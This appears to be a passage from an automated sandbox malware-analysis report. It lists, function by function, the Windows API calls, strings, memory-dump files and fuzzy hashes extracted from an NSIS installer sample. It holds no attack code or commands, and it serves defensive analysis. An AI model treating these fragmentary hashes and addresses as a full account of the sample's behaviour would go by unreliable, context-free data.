                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                      • MulDiv.KERNEL32(0000D000,00000064,001232F2), ref: 00403295
                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                                      • String ID: Exch: stack < %d elements$NormMimeThFreightNaturalInfrared$Pop: stack empty
                                                                                                                                                                                      • API String ID: 1459762280-1227625581
                                                                                                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
